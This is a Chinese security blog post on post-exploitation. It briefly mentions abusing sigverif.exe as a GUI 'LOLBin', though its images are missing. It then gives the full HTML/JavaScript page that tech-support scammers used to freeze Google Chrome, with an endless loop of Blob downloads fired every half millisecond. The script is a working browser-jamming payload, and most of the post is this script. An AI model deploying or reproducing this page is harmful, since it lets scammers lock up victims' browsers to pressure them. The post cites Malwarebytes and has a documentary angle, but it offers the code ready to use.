最新消息:

后渗透利用

未分类 demon 1092浏览 0评论

1.sigverif

文件签名验证与启动任意应用程序无关,但它只是与odbcad32.exe类似的情况- 有时会滥用GUI应用程序来产生不良影响 – 这些影响很可能是他们的作者未曾预料到的.

enter description here

enter description here

 

enter description here

 

 

 

I shot the sigverif.exe – the GUI-based LOLBin

 

2、无线下载谷歌浏览器

 

http://oc78wb8cz.bkt.clouddn.com/%E6%97%A0%E9%99%90%E4%B8%8B%E8%BD%BDPOC.mp4

 

<!doctype html>
<html>
<!--
The following code was used by tech support scammers to freeze Google Chrome and other browsers. More information below:
https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/
//-->
<script>
function download(g, h, j) {
    var k = new Blob([g], {
        type: j
    });
    if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
    else {
        var l = document.createElement("a"),
            m = URL.createObjectURL(k);
        l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
    }
}
function bomb_FF() {
    var g = Math.random().toString(36).substring(20),
        h = Math.floor(50 * Math.random() + 25);
    while (true) download(h, g, g)
}
function FF_jam() {
    bomb_FF()
}
setInterval(FF_jam, 0.5);
</script>
</html>

 

3.

enter description here

 

https://zhuanlan.kanxue.com/article-4866.htm

 

enter description here

 

 

 

转载请注明:即刻安全 » 后渗透利用

与本文相关的文章

  • 暂无相关文章!

您必须 登录 才能发表评论!



合作伙伴